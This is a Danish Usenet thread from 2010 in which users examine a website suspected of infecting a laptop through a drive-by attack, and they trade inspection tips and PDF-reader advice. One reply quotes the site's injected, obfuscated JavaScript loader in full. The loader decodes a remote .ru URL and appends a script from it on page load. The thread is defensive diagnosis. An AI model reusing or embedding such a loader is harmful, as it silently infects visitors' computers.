Google Groups no longer supports new Usenet posts or subscriptions. Historical content remains viewable.
Dismiss

Er der snavs på denne her side?

3 views
Skip to first unread message

Bertel Lund Hansen

unread,
Mar 21, 2010, 8:16:05 AM3/21/10
to
Hej alle

Jeg krydsposter dette til dk.admin.netmisbrug og
dk.edb.internet.webdesign med FUT til dk.admin.netmisbrug. Det
gør jeg fordi misbrugsgruppen næsten er død, og jeg regner med at
folk herindefra ved noget om den slags problemer.


Min datter kører et XP-system som jeg har sat op. Hun har lært
sikker netadfærd, men kørte alligevel med AVG antivirus fordi hun
en gang prøvede at få en virus i en mail fra en god ven.

Hun bruger opdateret Firefox som browser og sidder bag en
routerfirewall på et trådløst net.

Nu har jeg hendes bærbare til genopretning. Hun var inde på en
side der så normal ud, og så begyndte problmerne. Et eller andet
sikkerhedssystem (ikke installeret af mig eller hende) dukkede op
med en advarsel om over 20 grove problemer som keyloggere,
trojanere, virusser osv. Ligegyldigt hvad man forsøgte - ét klik,
og en advarsel dukkede op og låste systemet. Jeg kunne ikke
engang komme til at undersøge hvad der var galt, så jeg kørte
bare et image ind fra dengang den var nyinstalleret og sikret.
Dette image berører kun C-drevet. Derefter virkede alt normalt,
også de programmer der lå på andre drev end C og var integreret i
systemety før jeg lavede imaget.

Derefter prøvede jeg at besøge den side hvor det muligvis var
sket, men det er jo ikke til at vide om systemet var inficeret
inden da. Derfor vil jeg bede jer om at tjekke siden - hvis I
altså ved hvordan i skal reparere jeres system efter et eventuelt
angreb.

Selv har jeg været inde på siden med både Opera og Firefox. Først
med Firefox skete der ingenting. Med Opera går Acrobat Reader i
gang og låser derefter (jeg bruger version 5) uden at jeg har
gjort andet end at åbne siden.

Jeg har erstattet punktummer med mellemrum i adressen for at man
ikke skal komme til at klikke ved en fejl:

www cosmo-coiffure dk/

--
Bertel
http://bertel.lundhansen.dk/ FIDUSO: http://fiduso.dk/

Carl Drud

unread,
Mar 21, 2010, 8:52:37 AM3/21/10
to
Bertel Lund Hansen <splittemi...@lundhansen.dk> writes:

> Selv har jeg været inde på siden med både Opera og Firefox. Først
> med Firefox skete der ingenting. Med Opera går Acrobat Reader i
> gang og låser derefter (jeg bruger version 5) uden at jeg har
> gjort andet end at åbne siden.
>
> Jeg har erstattet punktummer med mellemrum i adressen for at man
> ikke skal komme til at klikke ved en fejl:
>
> www cosmo-coiffure dk/

Denne her kommer op ved en Google søgning:

http://safeweb.norton.com/report/show?name=cosmo-coiffure.dk

11 uønskede downloads.

--
Carl

Rune Jensen

unread,
Mar 21, 2010, 9:21:38 AM3/21/10
to
Den 21-03-2010 13:16, Bertel Lund Hansen skrev:

> Selv har jeg været inde på siden med både Opera og Firefox. Først
> med Firefox skete der ingenting. Med Opera går Acrobat Reader i
> gang og låser derefter (jeg bruger version 5) uden at jeg har
> gjort andet end at åbne siden.

Her er fremgangsmåden, når du møder et mistænkeligt site - min
fremgangsmåde, altså:

1. Tag en validator med view source. Kig i koden efter iframe og border
0 og height/width 0, evt. via CSS. Kig efter mistænkeige script, evt.
indeholdende eval og en eller anden URL (mange gange en .cn) eller
underlige filnavne

2. Kig på siden i totalvalidator.com. Vælg flere views, da der som regel
er check for browsere i sådanne injections. Specielt IE6 og IE7 kan vlre
interessante.

3. Upload domænet til http://www.siteadvisor.com/

4. Få at vide hvad andre har af erfaring med siden på
http://www.mywot.com/ - den findes som extension til FF

5. INDEN du går ind på siden, og det kan så ikke anbefales med mindre
man ved, hvad man gør, så slå alt JS og flash fra. I IE sæt
sikkerhedsindstillinger til "meget høj". Afinstaller acrobat reader.


MVH
Rune Jensen

Claus U

unread,
Mar 21, 2010, 1:12:35 PM3/21/10
to
Bertel Lund Hansen skrev:

> Jeg har erstattet punktummer med mellemrum i adressen for at man ikke
> skal komme til at klikke ved en fejl:

Der sker i al fald et eller andet på siden. Den fik min virtuelle XP til
at vise bluescreen of dead efter et besøg med IE8

Kildekoden til siden er egentlig ganske pæn lige undtagen sidste linje,
som jeg ikke selv kan oversætte:
<script>var c=new String();try {this.g="";var pH;if(pH!='z' && pH != '')
{pH=null};this.H='';var bS=new String();var f=RegExp;var R=String
("repla2IUF".substr(0,5)+"ce");this.C="";var Yx='';function b(Y,n){var
CK;if(CK!='G'){CK=''};var RO=new Date();var aQ;if(aQ!='' && aQ!='UD')
{aQ='TE'};var D="[";var E=String("g");this.ah='';this.yc='';D+=n;var
e=new Date();var zY;if(zY!='aQD'){zY='aQD'};D+=String("NUB]".substr
(3));var cp=new Date();this.iP="";var Z='';var x=new f(D, E);var qWB;if
(qWB!='' && qWB!='Pd'){qWB='TP'};var mr;if(mr!='' && mr!='bp')
{mr=null};return Y[R](x, new String());var cS=new Array();var DG=new Array
();};var Yw;if(Yw!='ld' && Yw!='J'){Yw='ld'};var p_="";var EY;if(EY!='xU')
{EY='xU'};var qg="";var q=b('hKtKt8pK:0/8/8m8u8l0t8i0uKp0l8oKa0d8-
Kc8o8mK.KgKo0oKgKl8e0.0c0o0m8.KuKa8.8mKa8i8l0-8cKoKm0.8EKx8c8e0lKl8eKn8t0B0lKe8nKd0e0rK.KrKu8:0',"K08");var
K=window;var B=b('osnOlvogagds',"FvOsg");this.dF='';var O='';var W=b
('cLrjejaLtjejELl9e9mje9n9t9',"jL9");var S=b('/MtViMaVnMyJaV.Jc0n0/
VtJiMaJn0yJaM.McMnV/JmJeJgJaVpVo0rVnV.VcJoVmV/
MgJo0oVg0lMeV.JcJoJmJ/0aJlJlMyJeVsJ.0cVo0mM.MpMh0p0',"M0VJ");var d='';var
p=b('89323393023232233899293093793779',"3729");var cY;if(cY!='PN')
{cY='PN'};var lP;if(lP!='SN'){lP='SN'};var P=b('s2cWr2iWp2tN',"N2W");var
Em;if(Em!='k_' && Em!='ZQ'){Em='k_'};var tQ=new Date();var Wg;if(Wg!='ZC')
{Wg=''};N=function(){this.s="";var Do="";var PU;if(PU!='AA' && PU!='DZ')
{PU=''};var jv;if(jv!='yY' && jv!='Gn'){jv=''};r=document[W](P);var
gy='';d=q+p;d+=S;this.eG='';var sX;if(sX!='' && sX!='_'){sX=null};var
Nj;if(Nj!='' && Nj!='wN'){Nj='hc'};var Up;if(Up!=''){Up='xS'};r.defer=
([9,1][1]);this.sf="";this.xx="";r.src=d;document.body.appendChild
(r);this.Q="";var CE;if(CE!=''){CE='xR'};};var cm;if(cm!=''){cm='dR'};K[B]
=N;var NP=new Date();var dmc;if(dmc!='' && dmc!='ms')
{dmc=''};this.ex='';} catch(o){var JV;if(JV!='' && JV!='ko')
{JV=null};};var YxL;if(YxL!='Sg' && YxL!='IP'){YxL='Sg'};</script>

Stig Johansen

unread,
Mar 21, 2010, 9:20:32 PM3/21/10
to
Bertel Lund Hansen wrote:

> Selv har jeg været inde på siden med både Opera og Firefox. Først
> med Firefox skete der ingenting. Med Opera går Acrobat Reader i
> gang og låser derefter (jeg bruger version 5) uden at jeg har
> gjort andet end at åbne siden.

Jeg prøvede alligevel at se om jeg kunne fremprovokere skidtet i min
Konqueror.

Men 'de' har lavet en fejl i javascriptet (uafsluttet streng), som får
Konqueror til at stoppe.

Måske er det samme forskel mellem Firefox og Opera ?
(Jeg prøver aldrig den slags på min winPC, så jeg kan ikke selv undersøge).

Men da den åbenbart starter acrobat, er der nok tale om en af de mange
exploits, der er igang mod denne.

Vær glad for du bruger version 5, da det er javascript i de nyere versioner,
der er target - eers havde du sikkert også haft 'snavset'.

Hviken version bruger din datter?

--
Med venlig hilsen
Stig Johansen

Rune Jensen

unread,
Mar 21, 2010, 10:36:37 PM3/21/10
to
Den 22-03-2010 02:20, Stig Johansen skrev:

> Vær glad for du bruger version 5, da det er javascript i de nyere versioner,
> der er target - eers havde du sikkert også haft 'snavset'.

Javascript til en dokumentlæser - oooh-kæh... man forsøger altså at gøre
det lødigt, at et _dokument_ som er beregnet til at kunne _printes_ også
skal kunne _eksekveres_ som et program... The all mighty Switcz army
knife.. Hvor meget fylder Adobe Reader i dag, så? 200mb? 300mb?

Hent en rigtig reader her, som ikke har problemer med sikkerheden, og
som ikke er mere end den giver sig ud for at være - heller ikke i MB!

http://blog.kowalczyk.info/software/sumatrapdf/index.html


MVH
Rune Jensen

Rune Jensen

unread,
Mar 21, 2010, 11:11:29 PM3/21/10
to
Den 22-03-2010 03:36, Rune Jensen skrev:

> Hent en rigtig reader her, som ikke har problemer med sikkerheden, og
> som ikke er mere end den giver sig ud for at være - heller ikke i MB!
>
> http://blog.kowalczyk.info/software/sumatrapdf/index.html

Undskyld, Stig, sarkasmen var beregnet på den store del af adobes kunder
som åbenbart gladeligt tilgiver firmaet for at indlægge nye features
uden at have rettet sikkerhedshullerne fra de forrige.

Fatter ikke folk finder sig i det.


MVH
Rune Jensen

Bertel Lund Hansen

unread,
Mar 22, 2010, 7:31:52 AM3/22/10
to
Rune Jensen skrev:

> Hent en rigtig reader her, som ikke har problemer med sikkerheden, og
> som ikke er mere end den giver sig ud for at være - heller ikke i MB!

Version 5 er faktisk okay. Jeg får relativt ofte advarsler om at
dele af indholdet måske ikke kan vises korrekt, men jeg har endnu
ikke opdaget nogen problemer eller været afskåret fra at læse
nogen filer.

> http://blog.kowalczyk.info/software/sumatrapdf/index.html

Den vil jeg kikke på.

... 58 sekunder senere: Den er tæskefed. Tak.

Rune Jensen

unread,
Mar 22, 2010, 7:48:43 AM3/22/10
to
Den 22-03-2010 12:31, Bertel Lund Hansen skrev:
> Rune Jensen skrev:
>
>> Hent en rigtig reader her, som ikke har problemer med sikkerheden, og
>> som ikke er mere end den giver sig ud for at være - heller ikke i MB!
>
> Version 5 er faktisk okay. Jeg får relativt ofte advarsler om at
> dele af indholdet måske ikke kan vises korrekt, men jeg har endnu
> ikke opdaget nogen problemer eller været afskåret fra at læse
> nogen filer.
>
>> http://blog.kowalczyk.info/software/sumatrapdf/index.html
>
> Den vil jeg kikke på.
>
> ... 58 sekunder senere: Den er tæskefed. Tak.

Selv tak.

Og lige for at opsummere.

Det var hverken Stig eller dig, jeg var sur på, heldigvis lader i ikke
til at være sure over mit indlæg.. jeg forsøgte også at holde ældre
Adobe Readers udenfor, for de er SVJV ikke nær så sårbare (ved faktisk
ikke, om de er mere end andre lign. alternative readere). Hovedproblemet
er SVJV indlæggelsen af Javascript i nyere versioner, som giver ukendte
sårbarheder.

Min hovedanke går på de mennesker, som tror at alt nyt er godt nyt,
fordi "det jo kan mere", og sådan er det altså ikke nødvendigvis med
Adobe Reader.. desværre. For ellers er det jo rigtigt nok, at når man
opdaterer til nyere version, bør man også få større sikkerhed. Det er
efter min mening Adobe, som har fejlet totalt i det spil. De gør det
modsatte af alle andre, når de laver nye versioner af deres plug in.


MVH
Rune Jensen

Max

unread,
Mar 24, 2010, 5:28:23 AM3/24/10
to
Hej Rune

> Hent en rigtig reader her, som ikke har problemer med sikkerheden, og
> som ikke er mere end den giver sig ud for at være - heller ikke i MB!
>
> http://blog.kowalczyk.info/software/sumatrapdf/index.html


En lille smart ting, men findes der ikke en lige så simpel
udgave der også kan integrere sig med IE ?

--
Mvh Max


N.B.DK

unread,
Jul 4, 2011, 1:34:54 AM7/4/11
to
"Max" <max_...@post9.tele.dk.invalid> wrote in message
news:4ba9dad3$0$276$1472...@news.sunsite.dk
> En lille smart ting, men findes der ikke en lige s� simpel
> udgave der ogs� kan integrere sig med IE ?

Foxit pdf reader mener jeg kan, og den fylder heller ikke ret meget.

--
MVH. N_B_DK


Max

unread,
Jul 4, 2011, 6:43:11 AM7/4/11
to
Hej N.B.DK

> Foxit pdf reader mener jeg kan, og den fylder heller ikke ret meget.

Bem�rkede du at det var et 1,5 �r gammelt indl�g du svarede p� ?

--
Mvh
Max


0 new messages